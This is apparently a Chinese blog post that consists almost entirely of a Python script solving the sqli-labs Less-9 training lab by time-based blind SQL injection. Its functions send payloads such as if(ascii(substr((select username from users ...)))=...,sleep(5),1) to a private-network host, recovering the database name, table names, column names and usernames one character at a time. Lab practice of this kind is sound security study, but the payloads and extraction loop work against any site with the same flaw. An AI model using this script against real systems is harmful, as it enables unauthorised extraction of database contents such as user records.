Less9

Python代码如下

import requests
from time import sleep,time
import threading
from concurrent.futures import ThreadPoolExecutor

def database_lenth():
    for i in range(10):
        url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(LENGTH(database())={i},sleep(1),1)--+"
        start_time = time()
        res = requests.get(url=url)
        used_time = time() - start_time
        # print(used_time)
        if(used_time > 1):
            print("数据库长度为" + str(i))
            return i

def database_name():
    s = ''
    for j in range(1,9):
        for i in range(65, 123):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select database()),{j},1))={i},sleep(1),1)--+"
            start_time = time()
            res = requests.get(url=url)
            used_time = time() - start_time
            if(used_time > 1):
                s = s + chr(i)
    print(s)

def table_lenth():
    lenths = []
    for j in range(5):
        for i in range(1, 20):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit {j},1))={i},sleep(2),1)--+"
            start_time = time()
            res = requests.get(url=url)
            used_time = time() - start_time
            if(used_time > 2):
                # print("第" + str(j) + "表长度是" + str(i))
                lenths.append((j,i))
                print(lenths)
    return dict(lenths)

def table_name():# 有时间上的小问题
    # a = table_lenth()
    for j in range(4):
        s = ''
        for site in range(9):
            for i in range(65, 123):
                url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {j},1),{site},1))={i},sleep(2),1)--+"
                start_time = time()
                res = requests.get(url=url)
                used_time = time() - start_time
                if(used_time >= 2):
                    s = s + chr(i)
        print(s)

def column_name():# 有时间上的小问题   休眠5秒判断4秒结果没问题
    # a = table_lenth()
    s = ''
    for site in range(9):
        for i in range(65, 123):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),{site},1))={i},sleep(5),1)--+"
            start_time = time()
            res = requests.get(url=url)
            used_time = time() - start_time
            if(used_time >= 4):
                s = s + chr(i)
    print(s)

def data():
    s = ''
    for site in range(9):
        for i in range(65, 123):
            url = f"http://192.168.232.132/sqli-labs/Less-9/?id=1' and if(ascii(substr((select username from users limit 0,1),{site},1))={i},sleep(5),1)--+"
            start_time = time()
            res = requests.get(url=url)
            used_time = time() - start_time
            if(used_time >= 4):
                s = s + chr(i)
    print(s)

if __name__ == "__main__":
    # database_lenth()
    # database_name()
    # table_name()
    # column_name()
    data()

标签: none

添加新评论